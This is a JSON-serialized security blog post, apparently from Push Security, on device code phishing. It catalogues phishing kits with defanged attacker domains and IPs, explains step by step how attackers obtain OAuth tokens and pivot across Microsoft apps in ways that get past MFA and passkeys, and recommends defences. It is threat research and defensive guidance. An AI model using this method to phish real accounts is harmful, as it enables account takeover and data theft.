footer",[],{},{"nodeType":1657,"data":11051,"content":11052},{},[11053,11063],{"nodeType":1687,"data":11054,"content":11055},{},[11056],{"nodeType":178,"data":11057,"content":11058},{},[11059],{"nodeType":173,"value":10147,"marks":11060,"data":11062},[11061],{"type":370},{},{"nodeType":1687,"data":11064,"content":11065},{},[11066],{"nodeType":178,"data":11067,"content":11068},{},[11069],{"nodeType":173,"value":11070,"marks":11071,"data":11072},"redirect-523346-d95027ec[.]s3.amazonaws.com",[],{},{"nodeType":312,"data":11074,"content":11078},{"target":11075},{"sys":11076},{"id":11077,"type":317,"linkType":318},"6WFXqUDzcJHKWSwVIcDZAf",[],{"nodeType":231,"data":11080,"content":11081},{},[],{"nodeType":235,"data":11083,"content":11084},{},[11085],{"nodeType":173,"value":11086,"marks":11087,"data":11089},"“DCSTATUS”",[11088],{"type":370},{},{"nodeType":1653,"data":11091,"content":11092},{},[11093,11115,11138,11161],{"nodeType":1657,"data":11094,"content":11095},{},[11096,11106],{"nodeType":1687,"data":11097,"content":11098},{},[11099],{"nodeType":178,"data":11100,"content":11101},{},[11102],{"nodeType":173,"value":9765,"marks":11103,"data":11105},[11104],{"type":370},{},{"nodeType":1687,"data":11107,"content":11108},{},[11109],{"nodeType":178,"data":11110,"content":11111},{},[11112],{"nodeType":173,"value":10049,"marks":11113,"data":11114},[],{},{"nodeType":1657,"data":11116,"content":11117},{},[11118,11128],{"nodeType":1687,"data":11119,"content":11120},{},[11121],{"nodeType":178,"data":11122,"content":11123},{},[11124],{"nodeType":173,"value":9872,"marks":11125,"data":11127},[11126],{"type":370},{},{"nodeType":1687,"data":11129,"content":11130},{},[11131],{"nodeType":178,"data":11132,"content":11133},{},[11134],{"nodeType":173,"value":11135,"marks":11136,"data":11137},"GET /dc/status/{base64url_sid}",[],{},{"nodeType":1657,"data":11139,"content":11140},{},[11141,11151],{"nodeType":1687,"data":11142,"content":11143},{},[11144],{"nodeType":178,"data":11145,"content":11146},{},[11147],{"nodeType":173,"value":9924,"marks":11148,"data":11150},[11149],{"type":370},{},{"nodeType":1687,"data":11152,"content":11153},{},[11154],{"nodeType":178,"data":11155,"content":11156},{},[11157],{"nodeType":173,"value":11158,"marks":11159,"data":11160},"Generic \"Microsoft 365 - Secure Access\" verification page",[],{},{"nodeType":1657,"data":11162,"content":11163},{},[11164,11174],{"nodeType":1687,"data":11165,"content":11166},{},[11167],{"nodeType":178,"data":11168,"content":11169},{},[11170],{"nodeType":173,"value":10147,"marks":11171,"data":11173},[11172],{"type":370},{},{"nodeType":1687,"data":11175,"content":11176},{},[11177],{"nodeType":178,"data":11178,"content":11179},{},[11180],{"nodeType":173,"value":11181,"marks":11182,"data":11183},"owa[.]apmmacleans[.]ca",[],{},{"nodeType":312,"data":11185,"content":11189},{"target":11186},{"sys":11187},{"id":11188,"type":317,"linkType":318},"ugYhHeXY1lQdKooALmrIs",[],{"nodeType":231,"data":11191,"content":11192},{},[],{"nodeType":235,"data":11194,"content":11195},{},[11196],{"nodeType":173,"value":11197,"marks":11198,"data":11200},"“DOLCE”",[11199],{"type":370},{},{"nodeType":312,"data":11202,"content":11206},{"target":11203},{"sys":11204},{"id":11205,"type":317,"linkType":318},"7TzU6kk01Un45NB0buEz2",[],{"nodeType":1653,"data":11208,"content":11209},{},[11210,11233,11271,11294,11317],{"nodeType":1657,"data":11211,"content":11212},{},[11213,11223],{"nodeType":1687,"data":11214,"content":11215},{},[11216],{"nodeType":178,"data":11217,"content":11218},{},[11219],{"nodeType":173,"value":9765,"marks":11220,"data":11222},[11221],{"type":370},{},{"nodeType":1687,"data":11224,"content":11225},{},[11226],{"nodeType":178,"data":11227,"content":11228},{},[11229],{"nodeType":173,"value":11230,"marks":11231,"data":11232},"Microsoft PowerApps hosting",[],{},{"nodeType":1657,"data":11234,"content":11235},{},[11236,11246],{"nodeType":1687,"data":11237,"content":11238},{},[11239],{"nodeType":178,"data":11240,"content":11241},{},[11242],{"nodeType":173,"value":9789,"marks":11243,"data":11245},[11244],{"type":370},{},{"nodeType":1687,"data":11247,"content":11248},{},[11249,11260],{"nodeType":178,"data":11250,"content":11251},{},[11252,11256],{"nodeType":173,"value":10224,"marks":11253,"data":11255},[11254],{"type":370},{},{"nodeType":173,"value":11257,"marks":11258,"data":11259},"34.53.159.84 (Google Cloud AS396982)",[],{},{"nodeType":178,"data":11261,"content":11262},{},[11263,11267],{"nodeType":173,"value":9830,"marks":11264,"data":11266},[11265],{"type":370},{},{"nodeType":173,"value":11268,"marks":11269,"data":11270}," Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/123.0.0.0 Safari/537.36",[],{},{"nodeType":1657,"data":11272,"content":11273},{},[11274,11284],{"nodeType":1687,"data":11275,"content":11276},{},[11277],{"nodeType":178,"data":11278,"content":11279},{},[11280],{"nodeType":173,"value":9872,"marks":11281,"data":11283},[11282],{"type":370},{},{"nodeType":1687,"data":11285,"content":11286},{},[11287],{"nodeType":178,"data":11288,"content":11289},{},[11290],{"nodeType":173,"value":11291,"marks":11292,"data":11293},"GET /api/generatecode (CloudFront)",[],{},{"nodeType":1657,"data":11295,"content":11296},{},[11297,11307],{"nodeType":1687,"data":11298,"content":11299},{},[11300],{"nodeType":178,"data":11301,"content":11302},{},[11303],{"nodeType":173,"value":9924,"marks":11304,"data":11306},[11305],{"type":370},{},{"nodeType":1687,"data":11308,"content":11309},{},[11310],{"nodeType":178,"data":11311,"content":11312},{},[11313],{"nodeType":173,"value":11314,"marks":11315,"data":11316},"Dolce & Gabbana branded, Italian language, MS account verification",[],{},{"nodeType":1657,"data":11318,"content":11319},{},[11320,11330],{"nodeType":1687,"data":11321,"content":11322},{},[11323],{"nodeType":178,"data":11324,"content":11325},{},[11326],{"nodeType":173,"value":10147,"marks":11327,"data":11329},[11328],{"type":370},{},{"nodeType":1687,"data":11331,"content":11332},{},[11333],{"nodeType":178,"data":11334,"content":11335},{},[11336],{"nodeType":173,"value":11337,"marks":11338,"data":11339},"data-migration-dolcegabbana[.]powerappsportals.com",[],{},{"nodeType":312,"data":11341,"content":11345},{"target":11342},{"sys":11343},{"id":11344,"type":317,"linkType":318},"4ayQDvpf5NNOBrj9wZZRiO",[],{"nodeType":3769,"data":11347,"content":11348},{},[11349],{"nodeType":178,"data":11350,"content":11351},{},[11352],{"nodeType":173,"value":11353,"marks":11354,"data":11355},"Clearly, device code phishing has entered mainstream adoption and we should be prepared for a lot more of it in future. So how does it work, and why is it so effective?",[],{},{"nodeType":231,"data":11357,"content":11358},{},[],{"nodeType":169,"data":11360,"content":11361},{},[11362],{"nodeType":173,"value":11363,"marks":11364,"data":11366},"Device code phishing under the hood",[11365],{"type":370},{},{"nodeType":178,"data":11368,"content":11369},{},[11370,11374],{"nodeType":173,"value":11371,"marks":11372,"data":11373},"The attacker POSTs to the authorization server's device authorization endpoint with its client_id (i.e. an application ID) and requested scopes or resources. The server responds with a device_code (used for polling), a user_code, a verification_uri, an expires_in value, and a polling interval. The user visits the URL, enters the code and approves the request. Meanwhile, the device polls the token endpoint. Once approved, the server returns an access token, a refresh token (if offline_access was requested), and an ID token (if openid was included). ",[],{},{"nodeType":173,"value":11375,"marks":11376,"data":11378},"The attacker now has API access to the victim's account. ",[11377],{"type":370},{},{"nodeType":178,"data":11380,"content":11381},{},[11382],{"nodeType":173,"value":11383,"marks":11384,"data":11385},"Broadly, this gives the attacker a comparable level of control to a “normal” phishing attack (with conditions based on the scopes granted and specific app being targeted) while API access grants additional capabilities beyond standard browser sessions. When combined with other techniques, this access can be exchanged to open normal browser app sessions and access SSO connected apps (e.g. the PRT escalation technique for Microsoft that I mentioned in earlier research).",[],{},{"nodeType":312,"data":11387,"content":11391},{"target":11388},{"sys":11389},{"id":11390,"type":317,"linkType":318},"1x7Lip7JdY2xlHKKurT7qJ",[],{"nodeType":178,"data":11393,"content":11394},{},[11395],{"nodeType":173,"value":11396,"marks":11397,"data":11398},"At this point, you can achieve a number of objectives both inside the app ecosystem and across SSO connected apps — e.g. data theft, disruption, and ultimately extortion.",[],{},{"nodeType":178,"data":11400,"content":11401},{},[11402,11406,11411,11415],{"nodeType":173,"value":11403,"marks":11404,"data":11405},"Critically, the initial request to generate a device code is typically ",[],{},{"nodeType":173,"value":11407,"marks":11408,"data":11410},"unauthenticated",[11409],{"type":370},{},{"nodeType":173,"value":11412,"marks":11413,"data":11414}," across all providers — ",[],{},{"nodeType":173,"value":11416,"marks":11417,"data":11419},"anyone can generate one, from any machine, without proving any relationship to the target organization.",[11418],{"type":370},{},{"nodeType":178,"data":11421,"content":11422},{},[11423,11427,11432],{"nodeType":173,"value":11424,"marks":11425,"data":11426},"So, the attacker has to deliver a set of instructions via a phishing channel (e.g. email, social media DM, corp IM platform, and so on) with a device code that they have generated. The victim then enters this code on the ",[],{},{"nodeType":173,"value":11428,"marks":11429,"data":11431},"legitimate device code login page",[11430],{"type":370},{},{"nodeType":173,"value":11433,"marks":11434,"data":11435}," for that app and issues the tokens to the attacker.",[],{},{"nodeType":312,"data":11437,"content":11441},{"target":11438},{"sys":11439},{"id":11440,"type":317,"linkType":318},"1txUYuQjH9FlbDGTo8AbZB",[],{"nodeType":235,"data":11443,"content":11444},{},[11445],{"nodeType":173,"value":11446,"marks":11447,"data":11449},"First-party vs. third-party apps",[11448],{"type":370},{},{"nodeType":178,"data":11451,"content":11452},{},[11453,11458,11462,11472],{"nodeType":173,"value":11454,"marks":11455,"data":11457},"First-party applications",[11456],{"type":370},{},{"nodeType":173,"value":11459,"marks":11460,"data":11461}," are commonly abused in Microsoft-targeted attacks. These are ",[],{},{"nodeType":186,"data":11463,"content":11465},{"uri":11464},"https://gist.github.com/dafthack/2c0bbcac72b10c1ee205d1dd2fed3fe7",[11466],{"nodeType":173,"value":11467,"marks":11468,"data":11471},"real Microsoft applications",[11469,11470],{"type":194},{"type":370},{},{"nodeType":173,"value":11473,"marks":11474,"data":11475}," registered in every Entra ID tenant. Not only are they allowed by default (unlike third-party apps that are often subject to additional restrictions and require additional tenant-level consent before they can be accessed by a user), they come with pre-consented permissions, and can even access undocumented “legacy” scopes. ",[],{},{"nodeType":178,"data":11477,"content":11478},{},[11479],{"nodeType":173,"value":11480,"marks":11481,"data":11482},"Many Microsoft first-party apps also belong to the Family of Client IDs (FOCI), meaning a refresh token obtained for one family member can be exchanged for access tokens to other family members without re-authentication. This means that an attacker can silently pivot to other apps and APIs from a single phished session.",[],{},{"nodeType":312,"data":11484,"content":11488},{"target":11485},{"sys":11486},{"id":11487,"type":317,"linkType":318},"ejNSC76jge1p1zzz9wwiG",[],{"nodeType":178,"data":11490,"content":11491},{},[11492],{"nodeType":173,"value":11493,"marks":11494,"data":11495},"In other cases third-party applications are leveraged. This doesn’t mean these are fresh, attacker created apps however (though it’s easier than ever for attackers to spin up their own OAuth apps using AI tools). They can simply be attacker-controlled instances of otherwise legitimate apps. ",[],{},{"nodeType":231,"data":11497,"content":11498},{},[],{"nodeType":169,"data":11500,"content":11501},{},[11502],{"nodeType":173,"value":11503,"marks":11504,"data":11506},"Why device code phishing is so dangerous",[11505],{"type":370},{},{"nodeType":235,"data":11508,"content":11509},{},[11510],{"nodeType":173,"value":11511,"marks":11512,"data":11514},"Device code phishing bypasses authentication controls (including passkeys)",[11513],{"type":370},{},{"nodeType":178,"data":11516,"content":11517},{},[11518,11522,11527,11531],{"nodeType":173,"value":11519,"marks":11520,"data":11521},"A device code phishing attack ",[],{},{"nodeType":173,"value":11523,"marks":11524,"data":11526},"cannot be prevented with authentication controls",[11525],{"type":370},{},{"nodeType":173,"value":11528,"marks":11529,"data":11530},". This includes all forms of MFA and ",[],{},{"nodeType":173,"value":11532,"marks":11533,"data":11535},"even “phishing-resistant” authentication methods such as passkeys. ",[11534],{"type":370},{},{"nodeType":178,"data":11537,"content":11538},{},[11539,11544,11548,11553],{"nodeType":173,"value":11540,"marks":11541,"data":11543},"The device code authorization is effectively performed post-authentication. ",[11542],{"type":370},{},{"nodeType":173,"value":11545,"marks":11546,"data":11547},"If you already have an active session in your browser, entering the device code and selecting your account from a drop-down menu is all that's needed. ",[],{},{"nodeType":173,"value":11549,"marks":11550,"data":11552},"No password or MFA required. ",[11551],{"type":370},{},{"nodeType":173,"value":11554,"marks":11555,"data":11556},"You can see an example in the video below.",[],{},{"nodeType":312,"data":11558,"content":11561},{"target":11559},{"sys":11560},{"id":10802,"type":317,"linkType":318},[],{"nodeType":178,"data":11563,"content":11564},{},[11565],{"nodeType":173,"value":11566,"marks":11567,"data":11568},"Even if you do have to sign in again (because you're not already signed in for some reason), the attack still works because it isn't targeting the login — it's targeting the authorization layer instead.",[],{},{"nodeType":178,"data":11570,"content":11571},{},[11572],{"nodeType":173,"value":11573,"marks":11574,"data":11575},"This is what makes device code phishing different to other standard phishing methods like AiTM phishing (and arguably even more effective in environments with strict identity control enforcement). ",[],{},{"nodeType":235,"data":11577,"content":11578},{},[11579],{"nodeType":173,"value":11580,"marks":11581,"data":11583},"Device code logins are a feature, not a vulnerability, making attacks difficult to block",[11582],{"type":370},{},{"nodeType":178,"data":11585,"content":11586},{},[11587,11591,11596],{"nodeType":173,"value":11588,"marks":11589,"data":11590},"Device code authorization is a legitimate mechanism that is regularly used in an enterprise environment, particularly for CLI logins. ",[],{},{"nodeType":173,"value":11592,"marks":11593,"data":11595},"This is a problem for security teams because the phishing attack effectively happens on the legitimate site",[11594],{"type":370},{},{"nodeType":173,"value":11597,"marks":11598,"data":11599},". The code is delivered to the victim via message or webpage, but the attack itself only happens when that code is entered onto the real device code login page.",[],{},{"nodeType":178,"data":11601,"content":11602},{},[11603],{"nodeType":173,"value":11604,"marks":11605,"data":11606},"Since there’s no traditional phishing payload being delivered on the attacker’s webpage, these sites are more resistant to detection and less likely to be flagged by email and network analysis. And in many cases, there’s no email (or webpage) to analyze at all.",[],{},{"nodeType":178,"data":11608,"content":11609},{},[11610,11614,11623],{"nodeType":173,"value":11611,"marks":11612,"data":11613},"Various apps can be a target, all of which implement the device code flow in slightly different ways, and also offer different levels of control and default security around these logins. For example, Google Workspace is a significantly lower risk target than Microsoft, GitHub, or AWS because ",[],{},{"nodeType":186,"data":11615,"content":11617},{"uri":11616},"https://developers.google.com/identity/protocols/oauth2/limited-input-device",[11618],{"nodeType":173,"value":11619,"marks":11620,"data":11622},"Google explicitly limits which scopes are available to the device code flow",[11621],{"type":194},{},{"nodeType":173,"value":197,"marks":11624,"data":11625},[],{},{"nodeType":231,"data":11627,"content":11628},{},[],{"nodeType":169,"data":11630,"content":11631},{},[11632],{"nodeType":173,"value":11633,"marks":11634,"data":11636},"Security recommendations",[11635],{"type":370},{},{"nodeType":178,"data":11638,"content":11639},{},[11640],{"nodeType":173,"value":11641,"marks":11642,"data":11643},"Security teams need to consider the risk posed by device code phishing across multiple apps where device code authorization grants are common, particularly for developers and technical users. ",[],{},{"nodeType":178,"data":11645,"content":11646},{},[11647],{"nodeType":173,"value":11648,"marks":11649,"data":11650},"In an ideal world, you would simply block device code logins. But this can’t be done without causing serious disruption in some environments, while some apps simply don’t provide the tools required to do so. For example, device code is the default CLI sign-in method for GitHub. Developer-heavy organizations are likely to encounter higher levels of legitimate use.",[],{},{"nodeType":178,"data":11652,"content":11653},{},[11654,11658,11667,11671,11676,11680,11685,11689,11694],{"nodeType":173,"value":11655,"marks":11656,"data":11657},"Microsoft arguably offers the strongest control options (other than Google, who negate it right out of the gate), though they do require a fair amount of work. ",[],{},{"nodeType":186,"data":11659,"content":11661},{"uri":11660},"https://techcommunity.microsoft.com/blog/microsoft-entra-blog/new-microsoft-managed-policies-to-raise-your-identity-security-posture/4286758",[11662],{"nodeType":173,"value":11663,"marks":11664,"data":11666},"Microsoft now explicitly recommends",[11665],{"type":194},{},{"nodeType":173,"value":11668,"marks":11669,"data":11670}," blocking device code flow for tenants that haven't used it in the past 25 days. Their guidance is to create a custom CA policy: target relevant users, set the ",[],{},{"nodeType":173,"value":11672,"marks":11673,"data":11675},"Authentication Flows",[11674],{"type":370},{},{"nodeType":173,"value":11677,"marks":11678,"data":11679}," condition to block ",[],{},{"nodeType":173,"value":11681,"marks":11682,"data":11684},"Device Code Flow",[11683],{"type":370},{},{"nodeType":173,"value":11686,"marks":11687,"data":11688},", and set the grant control to ",[],{},{"nodeType":173,"value":11690,"marks":11691,"data":11693},"Block Access",[11692],{"type":370},{},{"nodeType":173,"value":11695,"marks":11696,"data":11697},". Deploy in report-only mode first to identify any legitimate device code usage. ",[],{},{"nodeType":312,"data":11699,"content":11703},{"target":11700},{"sys":11701},{"id":11702,"type":317,"linkType":318},"mQIj2o9xRzkZYKNmanB25",[],{"nodeType":178,"data":11705,"content":11706},{},[11707],{"nodeType":173,"value":11708,"marks":11709,"data":11710},"For other apps, you’re mainly limited to monitoring and response. Ensuring you’re getting authentication logs for these apps is vital, and searching for unusual access patterns (e.g. unusual login protocols, having different IPs for the authorization grant and subsequent account activity). ",[],{},{"nodeType":231,"data":11712,"content":11713},{},[],{"nodeType":169,"data":11715,"content":11716},{},[11717],{"nodeType":173,"value":11718,"marks":11719,"data":11721},"How Push Security can help",[11720],{"type":370},{},{"nodeType":178,"data":11723,"content":11724},{},[11725],{"nodeType":173,"value":11726,"marks":11727,"data":11728},"Push customers can use our browser-based capabilities to overcome the limitations of app-level controls and detect, intercept, and shut down attacks in real time. ",[],{},{"nodeType":178,"data":11730,"content":11731},{},[11732],{"nodeType":173,"value":11733,"marks":11734,"data":11735},"Our research team is already tracking multiple device code phishing campaigns and toolkits, including the EvilTokens kit. Blocking controls are already in place to prevent customers from interacting with malicious pages that match our detections for these new toolkits, ensuring that these pages can be identified and blocked in real time regardless of the infrastructure. ",[],{},{"nodeType":178,"data":11737,"content":11738},{},[11739,11743,11752],{"nodeType":173,"value":11740,"marks":11741,"data":11742},"Using Push you can also ",[],{},{"nodeType":186,"data":11744,"content":11746},{"uri":11745},"https://pushsecurity.com/help/can-i-use-push-to-help-protect-against-device-code-phishing-scenarios/",[11747],{"nodeType":173,"value":11748,"marks":11749,"data":11751},"configure in-browser warnings",[11750],{"type":194},{},{"nodeType":173,"value":11753,"marks":11754,"data":11755}," whenever a user accesses a URL used for device code logins. This provides universal, last-mile protection against even ‘zero-day’ device code phishing attacks using previously unidentified toolkits.  ",[],{},{"nodeType":312,"data":11757,"content":11761},{"target":11758},{"sys":11759},{"id":11760,"type":317,"linkType":318},"3JsbGaOKSS3INzBUJpoh1W",[],{"nodeType":178,"data":11763,"content":11764},{},[11765],{"nodeType":173,"value":11766,"marks":11767,"data":11768},"When a user visits those URLs, Push will also emit a webhook event that the banner was shown and acknowledged. If a user opts to proceed, you can treat this as a high-fidelity alert for your security team to investigate, providing app-agnostic telemetry that may not already be provided in your logs from that particular vendor. You can also simply use Push to block users from accessing device login pages if you’re confident that disruption won’t be caused. ",[],{},{"nodeType":235,"data":11770,"content":11771},{},[11772],{"nodeType":173,"value":2824,"marks":11773,"data":11775},[11774],{"type":370},{},{"nodeType":178,"data":11777,"content":11778},{},[11779],{"nodeType":173,"value":5264,"marks":11780,"data":11781},[],{},{"nodeType":178,"data":11783,"content":11784},{},[11785,11788,11795,11798,11805,11808,11815],{"nodeType":173,"value":1451,"marks":11786,"data":11787},[],{},{"nodeType":186,"data":11789,"content":11790},{"uri":1456},[11791],{"nodeType":173,"value":1459,"marks":11792,"data":11794},[11793],{"type":194},{},{"nodeType":173,"value":2936,"marks":11796,"data":11797},[],{},{"nodeType":186,"data":11799,"content":11800},{"uri":3941},[11801],{"nodeType":173,"value":5287,"marks":11802,"data":11804},[11803],{"type":194},{},{"nodeType":173,"value":3949,"marks":11806,"data":11807},[],{},{"nodeType":186,"data":11809,"content":11810},{"uri":1469},[11811],{"nodeType":173,"value":1472,"marks":11812,"data":11814},[11813],{"type":194},{},{"nodeType":173,"value":1477,"marks":11816,"data":11817},[],{},{"entries":11819},{"hyperlink":11820,"inline":11821,"block":11822},[],[],[11823,11855,11862,11876,11890,11918,11924,11931,11936,11943,11947,11953,11956,11962,11968,11974,11980,11984,11989,11995,12000,12014,12020,12026,12040,12065,12092],{"sys":11824,"__typename":5311,"content":11825,"name":11854,"title":118},{"id":9297},{"json":11826},{"nodeType":165,"data":11827,"content":11828},{},[11829],{"nodeType":178,"data":11830,"content":11831},{},[11832,11836,11841,11845,11850],{"nodeType":173,"value":11833,"marks":11834,"data":11835},"At the start of March, we’d observed a ",[],{},{"nodeType":173,"value":11837,"marks":11838,"data":11840},"15x",[11839],{"type":370},{},{"nodeType":173,"value":11842,"marks":11843,"data":11844}," increase in device code phishing pages detected by our research team this year, with multiple kits and campaigns being tracked — with the kit now identified as EvilTokens the most prominent. ",[],{},{"nodeType":173,"value":11846,"marks":11847,"data":11849},"That figure has now risen to 37.5x",[11848],{"type":370},{},{"nodeType":173,"value":11851,"marks":11852,"data":11853},". More on that later. ",[],{},"DCP IB 1",{"sys":11856,"__typename":5345,"title":11857,"caption":11857,"layoutMode":118,"file":11858},{"id":9328},"Device code phishing evolution 2019-2026.",{"url":11859,"width":11860,"height":11861},"https://images.ctfassets.net/y1cdw1ablpvd/7dPjgH1qTrpBIdqE0D4D0g/91a1da0abec3bbcdd94203ce2807d94c/image11.png",1360,1160,{"sys":11863,"__typename":5311,"content":11864,"name":11875,"title":118},{"id":9438},{"json":11865},{"nodeType":165,"data":11866,"content":11867},{},[11868],{"nodeType":178,"data":11869,"content":11870},{},[11871],{"nodeType":173,"value":11872,"marks":11873,"data":11874},"PhaaS is key to the adoption of new phishing tools and techniques, providing broad access to criminal operators at scale while driving up execution standards. It has been central to the continued evolution of AITM and ClickFix, and is a strong indicator of what comes next for device code phishing.",[],{},"DCP IB 2",{"sys":11877,"__typename":5311,"content":11878,"name":11889,"title":118},{"id":9598},{"json":11879},{"nodeType":165,"data":11880,"content":11881},{},[11882],{"nodeType":178,"data":11883,"content":11884},{},[11885],{"nodeType":173,"value":11886,"marks":11887,"data":11888},"Since EvilTokens is the only one with public attribution, the names provided are internal codenames. The information per kit is by no means exhaustive and is likely to evolve over time. ",[],{},"DCP IP 7",{"sys":11891,"__typename":5311,"content":11892,"name":11917,"title":118},{"id":9656},{"json":11893},{"nodeType":165,"data":11894,"content":11895},{},[11896,11903,11910],{"nodeType":178,"data":11897,"content":11898},{},[11899],{"nodeType":173,"value":11900,"marks":11901,"data":11902},"Our codename for EvilTokens internally was derived from the overly descriptive page code describing its bot protection capabilities (a clear sign of vibe coding — thanks Claude!):",[],{},{"nodeType":178,"data":11904,"content":11905},{},[11906],{"nodeType":173,"value":11907,"marks":11908,"data":11909},"\u003C!-- FIXED ANTI-BOT SYSTEM - WON'T REDIRECT REAL USERS -->",[],{},{"nodeType":178,"data":11911,"content":11912},{},[11913],{"nodeType":173,"value":11914,"marks":11915,"data":11916},"\u003C!-- ENHANCED ANTI-BOT SYSTEM WITH SERVER-SIDE VALIDATION -->",[],{},"DCP IB3",{"sys":11919,"__typename":5345,"title":11920,"caption":11920,"layoutMode":118,"file":11921},{"id":9708},"Precursor A (Left) & B (Right): Different visual lures from January 2026. ",{"url":11922,"width":5358,"height":11923},"https://images.ctfassets.net/y1cdw1ablpvd/3pfFR7ICQQqOyhGAFAj67C/6f8873d82cc7f5233a0ca9baa74f7585/image15.png",773,{"sys":11925,"__typename":5345,"title":11926,"caption":11927,"layoutMode":118,"file":11928},{"id":9714},"Early ANTIBOT: First appearance of the ANTIBOT comments, mid-Jan.","Early ANTIBOT: First appearance of the ANTIBOT comments, late-Jan.",{"url":11929,"width":5358,"height":11930},"https://images.ctfassets.net/y1cdw1ablpvd/VAdFlnCF4YftsOV02wnwu/8813ea3957b65ddfb84bb8ba5fb25a55/image6.png",564,{"sys":11932,"__typename":5434,"title":11933,"arcadeDemoUrl":11934,"playText":11935},{"id":9720},"Early ANTIBOT page load","https://demo.arcade.software/wRcvXg62Lok57ZjOKgJI?embed","20 secs",{"sys":11937,"__typename":5345,"title":11938,"caption":11938,"layoutMode":118,"file":11939},{"id":9726},"\"Courts Access\" lure with a similar security verification to Early ANTIBOT.",{"url":11940,"width":11941,"height":11942},"https://images.ctfassets.net/y1cdw1ablpvd/7LEJpoif8dnub4qJw2z6kL/3b15161c9d3f2e4f7d4f323ec04f1f33/Group_687.png",3103,1200,{"sys":11944,"__typename":5434,"title":11945,"arcadeDemoUrl":11946,"playText":5437},{"id":9732},"ANTIBOT \"Courts Access\" lure","https://demo.arcade.software/8b4YuKm1EXPmgx2q7q2D?embed",{"sys":11948,"__typename":5345,"title":11949,"caption":11949,"layoutMode":118,"file":11950},{"id":9738},"Production ANTIBOT: Current EvilTokens implementation.",{"url":11951,"width":5358,"height":11952},"https://images.ctfassets.net/y1cdw1ablpvd/1J3fOSmUPF8f3FlcwYFoGe/5eff8c1a892f870d1488d6a0f38da03c/image12.png",591,{"sys":11954,"__typename":5434,"title":9426,"arcadeDemoUrl":11955,"playText":11935},{"id":9744},"https://demo.arcade.software/zB6dqehj1lbnB2dur9lB?embed",{"sys":11957,"__typename":5345,"title":11958,"caption":11958,"layoutMode":118,"file":11959},{"id":10165},"SHAREFILE kit.",{"url":11960,"width":5358,"height":11961},"https://images.ctfassets.net/y1cdw1ablpvd/1iKelffs399PIIBedgnqmu/64a40d1ad7f69f966665f44c52e0817b/image1.png",1500,{"sys":11963,"__typename":5345,"title":11964,"caption":11964,"layoutMode":118,"file":11965},{"id":10316},"CLURE kit.",{"url":11966,"width":11967,"height":11942},"https://images.ctfassets.net/y1cdw1ablpvd/6OWX6ynZ92THYXrFMz3HoS/999a86ab35d6711b537e1234d8b5860e/image3.png",1600,{"sys":11969,"__typename":5345,"title":11970,"caption":118,"layoutMode":118,"file":11971},{"id":10480},"LINKID landing page requires an email before serving the payload.",{"url":11972,"width":5358,"height":11973},"https://images.ctfassets.net/y1cdw1ablpvd/5XAibmWt8HDGbpOC9n1DEk/d4bcb1006d82116dff5865f5b911bc88/image9.png",1049,{"sys":11975,"__typename":5345,"title":11976,"caption":11976,"layoutMode":118,"file":11977},{"id":10638},"AUTHOV kit. Notably uses a popup like prod EvilTokens.",{"url":11978,"width":5358,"height":11979},"https://images.ctfassets.net/y1cdw1ablpvd/4wKaHuSRfMXvi056r88u0b/e77feca260fe5ceb07ea7a080a09148f/image8.png",1128,{"sys":11981,"__typename":5434,"title":11982,"arcadeDemoUrl":11983,"playText":11935},{"id":10802},"DOCUPOLL DCP Kit","https://demo.arcade.software/Wv84a7Vziha9RwTdctvg?embed",{"sys":11985,"__typename":5345,"title":11986,"caption":11986,"layoutMode":118,"file":11987},{"id":10965},"FLOW_TOKEN kit. Notably uses a popup like prod EvilTokens.",{"url":11988,"width":5358,"height":11979},"https://images.ctfassets.net/y1cdw1ablpvd/4Bvbx5dwwBTOvAzULbnhIF/2d676145af0648b1e6f43b624af3ffbc/image7.png",{"sys":11990,"__typename":5345,"title":11991,"caption":11991,"layoutMode":118,"file":11992},{"id":11077},"PAPRIKA kit.",{"url":11993,"width":5358,"height":11994},"https://images.ctfassets.net/y1cdw1ablpvd/2XqwbTyGXRBaH6OM0t9moI/107cd701784fe8eed96eea2b9c09731a/image5.png",727,{"sys":11996,"__typename":5345,"title":11997,"caption":11997,"layoutMode":118,"file":11998},{"id":11188},"DCSTATUS kit. ",{"url":11999,"width":5358,"height":11961},"https://images.ctfassets.net/y1cdw1ablpvd/1zKQp6Wi0ckDZMLHBriU2Y/7d1c7c348407dcbde2eb94551baca7f5/image14.png",{"sys":12001,"__typename":5311,"content":12002,"name":12013,"title":118},{"id":11205},{"json":12003},{"data":12004,"content":12005,"nodeType":165},{},[12006],{"data":12007,"content":12008,"nodeType":178},{},[12009],{"data":12010,"marks":12011,"value":12012,"nodeType":173},{},[],"Our suspicion is that this was a one-off — potentially for a red team exercise — rather than representative of a more widely used kit.","DCP IB 4",{"sys":12015,"__typename":5345,"title":12016,"caption":12016,"layoutMode":118,"file":12017},{"id":11344},"DOLCE kit.",{"url":12018,"width":5358,"height":12019},"https://images.ctfassets.net/y1cdw1ablpvd/6iUfj8vMymi2c7lZxj006n/88b8066e6bea9fa7a81bd6b546264796/image16.png",728,{"sys":12021,"__typename":5345,"title":12022,"caption":12022,"layoutMode":118,"file":12023},{"id":11390},"Device code phishing attack chain.",{"url":12024,"width":5358,"height":12025},"https://images.ctfassets.net/y1cdw1ablpvd/60e9ErrL8tp3xtoer4gNUl/83899c207f61fdd9ff8aad0e1001030d/image2.png",1275,{"sys":12027,"__typename":5311,"content":12028,"name":12039,"title":118},{"id":11440},{"json":12029},{"nodeType":165,"data":12030,"content":12031},{},[12032],{"nodeType":178,"data":12033,"content":12034},{},[12035],{"nodeType":173,"value":12036,"marks":12037,"data":12038},"One of the key limitations of early device code phishing was that the code was being sent directly over email (as in the Russia-linked campaigns in 2024-5). This meant that the code would expire unless used immediately, requiring highly engaged social engineering to pull off. To get around this, modern device code phishing pages are continuously polling for fresh codes via API. This arguably makes them more discoverable than simply providing the code and instructions in a direct message, but is way more scalable for the attacker. ",[],{},"DCP IB 5",{"sys":12041,"__typename":5311,"content":12042,"name":12064,"title":118},{"id":11487},{"json":12043},{"nodeType":165,"data":12044,"content":12045},{},[12046],{"nodeType":178,"data":12047,"content":12048},{},[12049,12053,12060],{"nodeType":173,"value":12050,"marks":12051,"data":12052},"These legacy scopes were abused in the Russia-linked ",[],{},{"nodeType":186,"data":12054,"content":12055},{"uri":1854},[12056],{"nodeType":173,"value":1857,"marks":12057,"data":12059},[12058],{"type":194},{},{"nodeType":173,"value":12061,"marks":12062,"data":12063}," campaign (a hybrid of ClickFix-style social engineering with OAuth abuse) reported by Push researchers. This created additional detection challenges as logging of activity against these scopes is not enabled by default. ",[],{},"DCP IB 